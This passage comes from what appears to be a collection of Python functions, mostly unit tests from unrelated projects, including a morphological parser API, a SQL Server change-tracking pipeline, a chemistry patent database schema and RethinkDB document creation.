json.loads(response.body)\n likely_word_log_prob = resp[likely_word]\n unlikely_word_log_prob = resp[unlikely_word]\n assert likely_word_log_prob > unlikely_word_log_prob\n\n # Re-generate and re-compile the parser\n 
################################################################################\n\n # Expect it to now parse tombait as tombe-ait fall-3IMP V-Agr\n\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=parser_4_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphologicalparser', id=parser_4_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'compile_attempt', morphological_parser_compile_attempt,\n log, wait=1, vocal=True, task_descr='compile parser %s' % parser_4_id)\n\n # Perform the same parse request as above and expect different results.\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=parser_4_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] != transcription1_correct_parse\n assert resp[transcription1] == transcription1_alt_parse\n\n # Delete the parser's LM\n ################################################################################\n\n # Expect it to still work as previously.\n\n response = self.app.delete(url('morphemelanguagemodel', id=categorial_language_model_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n\n params = json.dumps({'transcriptions': [transcription1]})\n response = self.app.put(url(controller='morphologicalparsers', action='parse',\n id=morphological_parser_id), params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp[transcription1] == transcription1_alt_parse\n\n # If we re-generate and re-compile, the compile will succeed (since it requires only a \n # phonology and a morphology) while the generate attempt will fail because there \n # will be no LM object to copy attribute values and file objects from.\n response = self.app.put(url(controller='morphologicalparsers', action='generate_and_compile',\n id=parser_4_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n morphological_parser_compile_attempt = resp['compile_attempt']\n\n # Poll GET /morphemelanguagemodels/id until generate_attempt changes.\n requester = lambda: self.app.get(url('morphologicalparser', id=parser_4_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'compile_attempt', morphological_parser_compile_attempt,\n log, wait=1, vocal=True, task_descr='compile parser %s' % parser_4_id)\n assert resp['compile_succeeded'] == True\n assert resp['generate_succeeded'] == False\n\n # Test GET /morphologicalparsers\n ################################################################################\n\n morphological_parsers = Session.query(MorphologicalParser).all()\n\n # Get all morphological parsers\n response = self.app.get(url('morphologicalparsers'), headers=self.json_headers, extra_environ=self.extra_environ_view)\n resp = json.loads(response.body)\n assert len(resp) == 4\n\n # Test the paginator GET params.\n paginator = {'items_per_page': 1, 'page': 1}\n response = self.app.get(url('morphologicalparsers'), paginator, headers=self.json_headers,\n extra_environ=self.extra_environ_view)\n resp = 
json.loads(response.body)\n assert len(resp['items']) == 1\n assert resp['items'][0]['name'] == morphological_parsers[0].name\n assert response.content_type == 'application/json'\n\n # Test the order_by GET params.\n order_by_params = {'order_by_model': 'MorphologicalParser', 'order_by_attribute': 'id',\n 'order_by_direction': 'desc'}\n response = self.app.get(url('morphologicalparsers'), order_by_params,\n headers=self.json_headers, extra_environ=self.extra_environ_view)\n resp = json.loads(response.body)\n assert resp[0]['id'] == morphological_parsers[-1].id\n assert response.content_type == 'application/json'\n\n # Test the order_by *with* paginator.\n params = {'order_by_model': 'MorphologicalParser', 'order_by_attribute': 'id',\n 'order_by_direction': 'desc', 'items_per_page': 1, 'page': 4}\n response = self.app.get(url('morphologicalparsers'), params,\n headers=self.json_headers, extra_environ=self.extra_environ_view)\n resp = json.loads(response.body)\n assert morphological_parsers[0].name == resp['items'][0]['name']\n\n # Expect a 400 error when the order_by_direction param is invalid\n order_by_params = {'order_by_model': 'MorphologicalParser', 'order_by_attribute': 'name',\n 'order_by_direction': 'descending'}\n response = self.app.get(url('morphologicalparsers'), order_by_params, status=400,\n headers=self.json_headers, extra_environ=self.extra_environ_view)\n resp = json.loads(response.body)\n assert resp['errors']['order_by_direction'] == u\"Value must be one of: asc; desc (not u'descending')\"\n assert response.content_type == 'application/json'\n\n # Test that GET /morphologicalparsers/<id> works correctly.\n\n # Try to get a morphological parser using an invalid id\n id = 100000000000\n response = self.app.get(url('morphologicalparser', id=id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin, status=404)\n resp = json.loads(response.body)\n assert u'There is no morphological parser with id %s' % id in json.loads(response.body)['error']\n assert response.content_type == 'application/json'\n\n # No id\n response = self.app.get(url('morphologicalparser', id=''), status=404,\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n assert json.loads(response.body)['error'] == 'The resource could not be found.'\n assert response.content_type == 'application/json'\n\n # Valid id\n response = self.app.get(url('morphologicalparser', id=morphological_parsers[0].id), headers=self.json_headers,\n extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp['name'] == morphological_parsers[0].name\n assert resp['description'] == morphological_parsers[0].description\n assert response.content_type == 'application/json'\n\n # Tests that GET /morphologicalparsers/new and GET /morphologicalparsers/id/edit return \n # the data needed to create or update a morphological parser.\n\n # Test GET /morphologicalparsers/new\n response = self.app.get(url('new_morphologicalparser'), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n assert len(resp['phonologies']) == 1\n assert len(resp['morphologies']) == 2\n assert len(resp['morpheme_language_models']) == 1\n\n # Not logged in: expect 401 Unauthorized\n response = self.app.get(url('edit_morphologicalparser', id=morphological_parsers[0].id), status=401)\n resp = json.loads(response.body)\n assert resp['error'] == u'Authentication is required to access this resource.'\n assert response.content_type == 'application/json'\n\n # Invalid id\n 
id = 9876544\n response = self.app.get(url('edit_morphologicalparser', id=id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin,\n status=404)\n assert u'There is no morphological parser with id %s' % id in json.loads(response.body)['error']\n assert response.content_type == 'application/json'\n\n # No id\n response = self.app.get(url('edit_morphologicalparser', id=''), status=404,\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n assert json.loads(response.body)['error'] == 'The resource could not be found.'\n assert response.content_type == 'application/json'\n\n # Valid id\n response = self.app.get(url('edit_morphologicalparser', id=morphological_parsers[0].id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n assert resp['morphological_parser']['name'] == morphological_parsers[0].name\n assert len(resp['data']['phonologies']) == 1\n assert len(resp['data']['morphologies']) == 2\n assert len(resp['data']['morpheme_language_models']) == 1\n assert response.content_type == 'application/json'\n\n # Tests that PUT /morphologicalparsers/id updates the morphological parser with id=id.\n\n foma_installed = h.foma_installed(force_check=True)\n\n morphological_parsers = [json.loads(json.dumps(m, cls=h.JSONOLDEncoder))\n for m in Session.query(MorphologicalParser).all()]\n morphological_parser_1_id = morphological_parsers[0]['id']\n morphological_parser_1_name = morphological_parsers[0]['name']\n morphological_parser_1_description = morphological_parsers[0]['description']\n morphological_parser_1_modified = morphological_parsers[0]['datetime_modified']\n morphological_parser_1_phonology_id = morphological_parsers[0]['phonology']['id']\n morphological_parser_1_morphology_id = morphological_parsers[0]['morphology']['id']\n morphological_parser_1_lm_id = morphological_parsers[0]['language_model']['id']\n morphological_parser_count = len(morphological_parsers)\n morphological_parser_1_dir = os.path.join(self.morphological_parsers_path,\n 'morphological_parser_%d' % morphological_parser_1_id)\n morphological_parser_1_morphophonology_path = os.path.join(\n morphological_parser_1_dir, 'morphophonology.script')\n if foma_installed:\n morphology_1_morphophonology = codecs.open(morphological_parser_1_morphophonology_path,\n mode='r', encoding='utf8').read()\n\n # Update the first morphological parser.\n original_backup_count = Session.query(MorphologicalParserBackup).count()\n params = self.morphology_create_params.copy()\n params.update({\n 'name': morphological_parser_1_name,\n 'description': u'New description',\n 'phonology': morphological_parser_1_phonology_id,\n 'morphology': morphological_parser_1_morphology_id,\n 'language_model': morphological_parser_1_lm_id\n })\n params = json.dumps(params)\n response = self.app.put(url('morphologicalparser', id=morphological_parser_1_id), params, self.json_headers,\n self.extra_environ_admin)\n resp = json.loads(response.body)\n new_backup_count = Session.query(MorphologicalParserBackup).count()\n datetime_modified = resp['datetime_modified']\n new_morphological_parser_count = Session.query(MorphologicalParser).count()\n assert morphological_parser_count == new_morphological_parser_count\n assert datetime_modified != morphological_parser_1_modified\n assert resp['description'] == u'New description'\n assert response.content_type == 'application/json'\n assert original_backup_count + 1 == new_backup_count\n backup = Session.query(MorphologicalParserBackup).filter(\n 
MorphologicalParserBackup.UUID==unicode(\n resp['UUID'])).order_by(\n desc(MorphologicalParserBackup.id)).first()\n assert backup.datetime_modified.isoformat() == morphological_parser_1_modified\n assert backup.description == morphological_parser_1_description\n assert response.content_type == 'application/json'\n\n # Attempt an update with no new input and expect to fail\n response = self.app.put(url('morphologicalparser', id=morphological_parser_1_id), params, self.json_headers,\n self.extra_environ_admin, status=400)\n resp = json.loads(response.body)\n morphological_parser_count = new_morphological_parser_count\n new_morphological_parser_count = Session.query(MorphologicalParser).count()\n our_morphological_parser_datetime_modified = Session.query(\n MorphologicalParser).get(morphological_parser_1_id).datetime_modified\n assert our_morphological_parser_datetime_modified.isoformat() == datetime_modified\n assert morphological_parser_count == new_morphological_parser_count\n assert resp['error'] == u'The update request failed because the submitted data were not new.'\n assert response.content_type == 'application/json'\n\n # Update the first morphological parser again.\n original_backup_count = new_backup_count\n params = self.morphology_create_params.copy()\n params.update({\n 'name': morphological_parser_1_name,\n 'description': u'Newer description',\n 'phonology': morphological_parser_1_phonology_id,\n 'morphology': morphological_parser_1_morphology_id,\n 'language_model': morphological_parser_1_lm_id\n })\n params = json.dumps(params)\n response = self.app.put(url('morphologicalparser', id=morphological_parser_1_id), params, self.json_headers,\n self.extra_environ_admin)\n resp = json.loads(response.body)\n new_backup_count = Session.query(MorphologicalParserBackup).count()\n datetime_modified = resp['datetime_modified']\n morphological_parser_count = new_morphological_parser_count\n new_morphological_parser_count = Session.query(MorphologicalParser).count()\n assert morphological_parser_count == new_morphological_parser_count\n assert resp['description'] == u'Newer description'\n assert response.content_type == 'application/json'\n assert original_backup_count + 1 == new_backup_count\n backup = Session.query(MorphologicalParserBackup).filter(\n MorphologicalParserBackup.UUID==unicode(\n resp['UUID'])).order_by(\n desc(MorphologicalParserBackup.id)).first()\n assert backup.datetime_modified.isoformat() == our_morphological_parser_datetime_modified.isoformat()\n assert backup.description == u'New description'\n assert response.content_type == 'application/json'\n\n # Tests that GET /morphologicalparsers//id/history returns the morphological parser with id=id and its previous incarnations.\n\n morphological_parser_1_backup_count = Session.query(MorphologicalParserBackup).count() # there should only be backups of parser #1\n morphological_parsers = Session.query(MorphologicalParser).all()\n morphological_parser_1_id = morphological_parsers[0].id\n morphological_parser_1_UUID = morphological_parsers[0].UUID\n\n # Now get the history of the first morphological parser (which was updated twice in ``test_update``.\n response = self.app.get(\n url(controller='morphologicalparsers', action='history', id=morphological_parser_1_id),\n headers=self.json_headers, extra_environ=self.extra_environ_view_appset)\n resp = json.loads(response.body)\n assert response.content_type == 'application/json'\n assert 'morphological_parser' in resp\n assert 'previous_versions' in resp\n assert 
len(resp['previous_versions']) == morphological_parser_1_backup_count\n\n # Get the same history as above, except use the UUID\n response = self.app.get(\n url(controller='morphologicalparsers', action='history', id=morphological_parser_1_UUID),\n headers=self.json_headers, extra_environ=self.extra_environ_view_appset)\n resp = json.loads(response.body)\n assert response.content_type == 'application/json'\n assert 'morphological_parser' in resp\n assert 'previous_versions' in resp\n assert len(resp['previous_versions']) == morphological_parser_1_backup_count\n\n # Attempt to get the history with an invalid id and expect to fail\n response = self.app.get(\n url(controller='morphologicalparsers', action='history', id=123456789),\n headers=self.json_headers, extra_environ=self.extra_environ_view_appset, status=404)\n resp = json.loads(response.body)\n assert response.content_type == 'application/json'\n assert resp['error'] == u'No morphological parsers or morphological parser backups match 123456789'\n\n # Test servecompiled\n response = self.app.get(url(controller='morphologicalparsers', action='servecompiled',\n id=morphological_parser_1_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n binary_path = os.path.join(morphological_parser_1_dir, 'morphophonology.foma')\n binary_file = open(binary_path, 'rb').read()\n binary_file_from_resp = response.body\n assert binary_file == binary_file_from_resp\n\n # Test export\n response = self.app.get(url(controller='morphologicalparsers', action='export',\n id=morphological_parser_1_id), headers=self.json_headers, extra_environ=self.extra_environ_admin)\n assert response.content_type == 'application/zip'\n # To ensure the exported parser works, unzip it and test it out: ./parse.py chiens chats\n\n parser_1_cache = sorted([p.transcription for p in Session.query(model.Parse).\\\n filter(model.Parse.parser_id==morphological_parser_1_id).all()])\n assert parser_1_cache == [u'abc', u'chiens', u'tombait']\n\n # Test morphological parser deletion.\n assert u'morphophonology.script' in os.listdir(morphological_parser_1_dir)\n assert u'morphophonology.foma' in os.listdir(morphological_parser_1_dir)\n response = self.app.delete(url('morphologicalparser', id=morphological_parser_1_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = json.loads(response.body)\n assert not os.path.exists(morphological_parser_1_dir)\n assert resp['description'] == u'Newer description'\n assert resp['phonology']['id'] == morphological_parser_1_phonology_id", "def test_documents_for(self):\n # Test the default ES version\n self._test_documents_for(_documents_for)\n\n # Test the DB version\n self._test_documents_for(_db_documents_for)", "def test_primary_keys_headers(sdc_builder, sdc_executor, database):\n if not database.is_ct_enabled:\n pytest.skip('Test only runs against SQL Server with CT enabled.')\n\n pipeline = None\n table_name = get_random_string(string.ascii_lowercase, 20)\n connection = database.engine.connect()\n\n try:\n logger.info('Creating source table %s in %s database ...', table_name, database.type)\n table = sqlalchemy.Table(\n table_name,\n sqlalchemy.MetaData(database.engine),\n sqlalchemy.Column('name', sqlalchemy.String(64), primary_key=True),\n sqlalchemy.Column('pokedex_id', sqlalchemy.Integer, primary_key=True),\n sqlalchemy.Column('type', sqlalchemy.String(64)),\n sqlalchemy.Column('generation', sqlalchemy.Integer)\n )\n table.create(database.engine)\n\n # Create the pipeline\n pipeline_builder = 
sdc_builder.get_pipeline_builder()\n sql_server_change_tracking = pipeline_builder.add_stage('SQL Server Change Tracking Client')\n sql_server_change_tracking.set_attributes(\n table_configs=[{\n 'initialOffset': 0,\n 'schema': 'dbo',\n 'tablePattern': f'{table_name}'\n }]\n )\n wiretap = pipeline_builder.add_wiretap()\n sql_server_change_tracking >> wiretap.destination\n\n pipeline = pipeline_builder.build(\"SQL Server CT Pipeline\").configure_for_environment(database)\n sdc_executor.add_pipeline(pipeline)\n connection = database.engine.connect()\n # enable change tracking on table\n connection.execute(f'ALTER TABLE {table_name} ENABLE change_tracking WITH (track_columns_updated = on)')\n\n sdc_executor.start_pipeline(pipeline)\n\n # Define the data for each statement\n initial_data = {'name': 'Azurill', 'pokedex_id': 298, 'type': 'Normal', 'generation': 3}\n updated_data = {'name': 'Azurill', 'pokedex_id': 298, 'type': 'Normal/Fairy', 'generation': 6}\n\n # Insert some data and update it\n connection.execute(f\"\"\"\n insert into {table_name}\n values (\n '{initial_data.get(\"name\")}',\n {initial_data.get(\"pokedex_id\")},\n '{initial_data.get(\"type\")}',\n {initial_data.get(\"generation\")}\n )\n \"\"\")\n\n # In order to ensure all changes are tracked, a pause is added between changes so no record is lost\n sleep(5)\n\n connection.execute(f\"\"\"\n update {table_name}\n set type = '{updated_data.get(\"type\")}', generation = {updated_data.get(\"generation\")}\n where name = '{updated_data.get(\"name\")}' and pokedex_id = {updated_data.get(\"pokedex_id\")}\n \"\"\")\n\n sleep(5)\n\n connection.execute(f\"delete from {table_name}\")\n\n sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', 3)\n assert len(wiretap.output_records) == 3\n\n primary_key_before_prefix = \"jdbc.primaryKey.before.\"\n primary_key_after_prefix = \"jdbc.primaryKey.after.\"\n\n for index in range(0, 3):\n header_values = wiretap.output_records[index].header.values\n\n assert primary_key_before_prefix + \"type\" not in header_values\n assert primary_key_before_prefix + \"generation\" not in header_values\n assert primary_key_after_prefix + \"type\" not in header_values\n assert primary_key_after_prefix + \"generation\" not in header_values\n\n if index == 1:\n assert header_values['sdc.operation.type'] == '3'\n assert header_values['jdbc.SYS_CHANGE_OPERATION'] == 'U'\n\n assert primary_key_before_prefix + \"name\" in header_values\n assert primary_key_before_prefix + \"pokedex_id\" in header_values\n assert primary_key_after_prefix + \"name\" in header_values\n assert primary_key_after_prefix + \"pokedex_id\" in header_values\n\n assert header_values[primary_key_before_prefix + \"name\"] is not None\n assert header_values[primary_key_before_prefix + \"pokedex_id\"] is not None\n assert header_values[primary_key_after_prefix + \"name\"] is not None\n assert header_values[primary_key_after_prefix + \"pokedex_id\"] is not None\n\n assert header_values[f\"{primary_key_before_prefix}name\"] == initial_data.get(\"name\")\n assert header_values[f\"{primary_key_before_prefix}pokedex_id\"] == f'{initial_data.get(\"pokedex_id\")}'\n assert header_values[f\"{primary_key_after_prefix}name\"] == updated_data.get(\"name\")\n assert header_values[f\"{primary_key_after_prefix}pokedex_id\"] == f'{updated_data.get(\"pokedex_id\")}'\n else:\n if index == 0:\n assert header_values['sdc.operation.type'] == '1'\n assert header_values['jdbc.SYS_CHANGE_OPERATION'] == 'I'\n else:\n assert 
header_values['sdc.operation.type'] == '2'\n assert header_values['jdbc.SYS_CHANGE_OPERATION'] == 'D'\n\n assert primary_key_before_prefix + \"name\" not in header_values\n assert primary_key_before_prefix + \"pokedex_id\" not in header_values\n assert primary_key_after_prefix + \"name\" not in header_values\n assert primary_key_after_prefix + \"pokedex_id\" not in header_values\n\n finally:\n logger.info('Dropping table %s in %s database...', table_name, database.type)\n connection.execute(f'drop table if exists {table_name}')\n\n if pipeline and (sdc_executor.get_pipeline_status(pipeline).response.json().get('status') == 'RUNNING'):\n sdc_executor.stop_pipeline(pipeline)", "def __init__(self, db,\n relevant_classes=DocumentClass.default_relevant_set,\n load_titles=True,\n load_classifications=True,\n overwrite=False,\n allow_doc_dups=True):\n\n logger.info( \"Life-sci relevant classes: {}\".format(relevant_classes) )\n logger.info( \"Duplicate docs allowed? {}\".format(allow_doc_dups) )\n\n self.db = db\n self.relevant_classes = relevant_classes\n self.load_titles = load_titles\n self.load_classifications = load_classifications\n self.overwrite = overwrite\n self.allow_document_dups = allow_doc_dups\n\n self.relevant_regex = re.compile( '|'.join(relevant_classes) )\n\n self.metadata = MetaData()\n self.doc_id_map = dict()\n self.existing_chemicals = set()\n\n # This SQL Alchemy schema is a very useful programmatic tool for manipulating and querying the SureChEMBL data.\n # It's mostly used for testing, except for document insertion where 'inserted_primary_key' is used to\n # avoid costly querying of document IDs\n\n self.docs = Table('schembl_document', self.metadata,\n Column('id', Integer, Sequence('schembl_document_id'), primary_key=True),\n Column('scpn', String(50), unique=True),\n Column('published', Date()),\n Column('life_sci_relevant', SmallInteger()),\n Column('assign_applic', String(1000)), \n Column('family_id', Integer))\n\n self.titles = Table('schembl_document_title', self.metadata,\n Column('schembl_doc_id', Integer, ForeignKey('schembl_document.id'), primary_key=True),\n Column('lang', String(10), primary_key=True),\n Column('text', Text()))\n\n self.classes = Table('schembl_document_class', self.metadata,\n Column('schembl_doc_id', Integer, ForeignKey('schembl_document.id'), primary_key=True),\n Column('class', String(100), primary_key=True),\n Column('system', SmallInteger(), primary_key=True))\n\n self.chemicals = Table('schembl_chemical', self.metadata,\n Column('id', Integer, primary_key=True),\n Column('mol_weight', Float()),\n Column('logp', Float()),\n Column('med_chem_alert', SmallInteger()),\n Column('is_relevant', SmallInteger()),\n Column('donor_count', SmallInteger()),\n Column('acceptor_count', SmallInteger()),\n Column('ring_count', SmallInteger()),\n Column('rot_bond_count', SmallInteger()),\n Column('corpus_count', Integer()))\n\n self.chem_structures = Table('schembl_chemical_structure', self.metadata,\n Column('schembl_chem_id', Integer, ForeignKey('schembl_chemical.id'), primary_key=True),\n Column('smiles', Text()),\n Column('std_inchi', Text()),\n Column('std_inchikey', String(27)))\n\n self.chem_mapping = Table('schembl_document_chemistry', self.metadata,\n Column('schembl_doc_id', Integer, ForeignKey('schembl_document.id'), primary_key=True),\n Column('schembl_chem_id', Integer, ForeignKey('schembl_chemical.id'), primary_key=True),\n Column('field', SmallInteger, primary_key=True),\n Column('frequency', Integer))\n\n # Define types for chemical 
structure inserts\n if (\"cx_oracle\" in str(db.dialect)):\n logger.info( \"cx_oracle dialect detected, setting CLOB input types for structure INSERT statements.\"\\\n \" (required for long strings inserted as part of executemany operations)\" )\n import cx_Oracle\n self.chem_struc_types = (None, cx_Oracle.CLOB, cx_Oracle.CLOB, None)\n else:\n self.chem_struc_types = None", "def data_quality_check(spark, input_data):\n\n # check part of star_schema, number of rows and columns of tables in ops folder \n star_schema_tables = ['immigrations_table', \n 'date_table', \n 'cities_table', \n 'states_table', \n 'us_state_temperatures_table', \n 'country_temperatures_table']\n found_tables = []\n\n path = os.path.join(input_data, 'ops')\n table_names = [y for x, y, z in os.walk(path)][0]\n subdirs = glob.glob(path + '/*/')\n df_check = {}\n for name, path in zip(table_names, subdirs):\n # check part of schema\n if name not in star_schema_tables:\n raise ValueError(f'Table {name} not known from star schema.')\n # load table from parquet\n df_check[name] = spark.read.parquet(path)\n logging.info(f'Dataframe <{name}> successfully loaded.')\n # count rows and columns\n rows_count = df_check[name].count()\n cols_count = len(df_check[name].columns)\n if rows_count < 1:\n raise ValueError(f'Data quality check failed! <{name}> contains 0 rows.')\n if cols_count < 2:\n raise ValueError(f'Data quality check failed! <{name}> contains 0 columns.')\n logging.info(f'Data Quality Checks passed successfully. <{name}> contains <{rows_count}> rows and <{cols_count}> columns.\\n')\n found_tables.append(name)\n\n # sorting both the lists \n star_schema_tables.sort() \n found_tables.sort() \n # check part of star schema \n if star_schema_tables != found_tables:\n raise ValueError('Tables not identical to star schema.')\n logging.info('All tables from star schema exist.')", "def run_tests():\n source1 = TextModel('CS111 Syllabus')\n source1.add_file('CS111_Syllabus.txt')\n\n source2 = TextModel('AR Syllabus')\n source2.add_file('AR_Syllabus.txt')\n\n new1 = TextModel('WR120 Syllabus')\n new1.add_file('WR120_Syllabus.txt')\n new1.classify(source1, source2)\n \n new2 = TextModel('CS131 Syllabus')\n new2.add_file('CS131_Syllabus.txt')\n new2.classify(source1, source2)\n \n new3 = TextModel('My Paper 2 for WR120')\n new3.add_file('WR_Paper_2.txt')\n new3.classify(source1, source2)\n \n new4 = TextModel('CS111 PS9PR0')\n new4.add_file('ps9pr0.txt')\n new4.classify(source1, source2)", "def test_create_doc(self):\r\n function_name = sys._getframe().f_code.co_name\r\n db_name = \"{}_{}\".format(function_name, \"db\")\r\n db_name_illegal_by_rdb = \"{}_{}\".format(\r\n db_name,\r\n self.ILLEGAL_BY_RDB\r\n )\r\n db_name_illegal_by_this_program = \"{}_{}\".format(\r\n db_name,\r\n self.ILLEGAL_BY_THIS_PROGRAM\r\n )\r\n table_name = \"{}_{}\".format(function_name, \"table\")\r\n table_name_illegal_by_rdb = \"{}_{}\".format(\r\n table_name,\r\n self.ILLEGAL_BY_RDB\r\n )\r\n table_name_illegal_by_this_program = \"{}_{}\".format(\r\n table_name,\r\n self.ILLEGAL_BY_THIS_PROGRAM\r\n )\r\n doc_1 = {\"name\": \"alpha\", \"no\":\"1\"}\r\n doc_2 = {\"name\": \"beta\", \"no\":\"2\"}\r\n doc_3 = {\"name\": \"charlie\", \"no\":\"1\"}\r\n doc_4 = {\"name\": \"charlie\", \"no\":\"3\"}\r\n\r\n test_list_1 = [\r\n db_name,\r\n table_name,\r\n doc_1,\r\n [\"no\"],\r\n False,\r\n None,\r\n None,\r\n False\r\n ]\r\n test_list_2 = [\r\n test_list_1[0],\r\n test_list_1[1],\r\n doc_2,\r\n [\"no\"],\r\n None\r\n ]\r\n test_list_3 = [\r\n 
test_list_1[0],\r\n test_list_1[1],\r\n doc_3,\r\n [\"no\"],\r\n None\r\n ]\r\n test_list_4 = [\r\n test_list_1[0],\r\n test_list_1[1],\r\n doc_4,\r\n [\"name\", \"no\"],\r\n None\r\n ]\r\n test_list_5 = [\r\n db_name_illegal_by_rdb,\r\n table_name_illegal_by_rdb,\r\n doc_1,\r\n None\r\n ]\r\n test_list_6 = [\r\n db_name_illegal_by_rdb,\r\n table_name_illegal_by_this_program,\r\n doc_1,\r\n None\r\n ]\r\n test_list_7 = [\r\n db_name_illegal_by_this_program,\r\n table_name_illegal_by_rdb,\r\n doc_1,\r\n None\r\n ]\r\n test_list_8 = [\r\n db_name_illegal_by_this_program,\r\n table_name_illegal_by_this_program,\r\n doc_1,\r\n None\r\n ]\r\n\r\n crd(self.c, test_list_1[0])\r\n crt(self.c, test_list_1[1], test_list_1[0])\r\n test_list_1[len(test_list_1) - 1] = isinstance(\r\n crdoc(\r\n self.c,\r\n test_list_1[2],\r\n test_list_1[1],\r\n test_list_1[0],\r\n _expr=True\r\n ),\r\n r.ast.Insert\r\n )\r\n test_list_1[len(test_list_1) - 2] = crdoc(\r\n self.c,\r\n test_list_1[2],\r\n test_list_1[1],\r\n test_list_1[0]\r\n )\r\n test_list_1[len(test_list_1) - 3] = crdoc(\r\n self.c,\r\n test_list_1[2],\r\n test_list_1[1],\r\n test_list_1[0],\r\n test_list_1[3]\r\n )\r\n test_list_1[len(test_list_1) - 4] = isinstance(\r\n crdoc(\r\n self.c,\r\n test_list_1[2],\r\n test_list_1[1],\r\n test_list_1[0],\r\n [\"name\", \"no\"],\r\n True\r\n ),\r\n r.ast.Insert\r\n )\r\n test_list_2[len(test_list_2) - 1] = crdoc(\r\n self.c,\r\n test_list_2[2],\r\n test_list_2[1],\r\n test_list_2[0],\r\n test_list_2[3]\r\n )\r\n crt(self.c, test_list_3[1], test_list_3[0])\r\n test_list_3[len(test_list_3) - 1] = crdoc(\r\n self.c,\r\n test_list_3[2],\r\n test_list_3[1],\r\n test_list_3[0],\r\n test_list_3[3]\r\n )\r\n test_list_4[len(test_list_4) - 1] = crdoc(\r\n self.c,\r\n test_list_4[2],\r\n test_list_4[1],\r\n test_list_4[0],\r\n test_list_4[3]\r\n )\r\n dd(self.c, test_list_1[0])\r\n\r\n \"\"\"Test 1.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_5[len(test_list_5) - 1] = crdoc(\r\n self.c,\r\n test_list_5[2],\r\n test_list_5[1],\r\n test_list_5[0]\r\n )\r\n\r\n \"\"\"Test 2.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_6[len(test_list_6) - 1] = crdoc(\r\n self.c,\r\n test_list_6[2],\r\n test_list_6[1],\r\n test_list_6[0]\r\n )\r\n\r\n r.db_create(test_list_7[0]).run(self.c)\r\n \"\"\"Test 3.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_7[len(test_list_7) - 1] = crdoc(\r\n self.c,\r\n test_list_7[2],\r\n test_list_7[1],\r\n test_list_7[0]\r\n )\r\n r.db_drop(test_list_7[0]).run(self.c)\r\n\r\n r.db_create(test_list_8[0]).run(self.c)\r\n r.db(test_list_8[0]).table_create(test_list_8[0]).run(self.c)\r\n \"\"\"Test 4.\"\"\"\r\n with self.assertWarns(CDW):\r\n test_list_8[len(test_list_8) - 1] = crdoc(\r\n self.c,\r\n test_list_8[2],\r\n test_list_8[1],\r\n test_list_8[0]\r\n )\r\n r.db_drop(test_list_8[0]).run(self.c)\r\n\r\n self.assertTrue(test_list_1[len(test_list_1) - 1]) # Test 5.\r\n self.assertIsNotNone(test_list_1[len(test_list_1) - 2]) # Test 6.\r\n self.assertIsNone(test_list_1[len(test_list_1) - 3]) # Test 7.\r\n self.assertFalse(test_list_1[len(test_list_1) - 4]) # Test 8\r\n self.assertIsNotNone(test_list_2[len(test_list_2) - 1]) # Test 9.\r\n self.assertIsNone(test_list_3[len(test_list_3) - 1]) # Test 10.\r\n self.assertIsNotNone(test_list_4[len(test_list_4) - 1]) # Test 11.\r\n self.assertIsNone(test_list_5[len(test_list_5) - 1]) # Test 12.\r\n self.assertIsNone(test_list_6[len(test_list_6) - 1]) # Test 13.\r\n self.assertIsNone(test_list_7[len(test_list_7) - 1]) # Test 14.\r\n 
self.assertIsNone(test_list_8[len(test_list_8) - 1]) # Test 15.\r", "def test_number_of_concepts(self):\n \n _log.info('-'*80)\n \n # arrange \n dump_file = getInputFile(\"wikidump_Knowledge_Love_War.xml\")\n parsed_file = getOutputFile(\"wikidump_Knowledge_Love_War.parsed.xml\")\n \n # act\n wn.parse_dump(dump_file, parsed_file)\n db_wrapper = wn.build_database_wrapper(parsed_file, StopWordsStemmer([]))\n \n titles_count =len(db_wrapper.title_index)\n concepts_count =len(db_wrapper.concepts_index)\n \n # assert\n self.assertEqual(titles_count, 3, \"number of tiltes should be 3, got {0}\".format(titles_count)) \n self.assertEqual(concepts_count, 3, \"number of tiltes should be 3, got {0}\".format(concepts_count))", "def test_type_code(self):\n inv_search = \"collection:review\"\n spi_search = \"find tc review\"\n self._compare_searches(inv_search, spi_search)\n inv_search = \"collection:review\"\n spi_search = \"find ps review\"\n self._compare_searches(inv_search, spi_search)\n inv_search = \"collection:review\"\n spi_search = \"find scl review\"\n self._compare_searches(inv_search, spi_search)", "def test_short_words_are_removed(self):\n dataset_1 = factories.SourceDatasetFactory.create(\n i_dbgap_description='lorem ipsum',\n source_study_version__study=self.study\n )\n dataset_2 = factories.SourceDatasetFactory.create(\n i_dbgap_description='lorem ipsum',\n source_study_version__study=self.study\n )\n response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem ip'})\n context = response.context\n self.assertIn('form', context)\n self.assertTrue(context['has_results'])\n self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)\n self.assertEqual(len(context['results_table'].rows), 2)\n self.assertIn(dataset_1, context['results_table'].data)\n self.assertIn(dataset_2, context['results_table'].data)", "def test_match_table_post(self):\n pass", "def 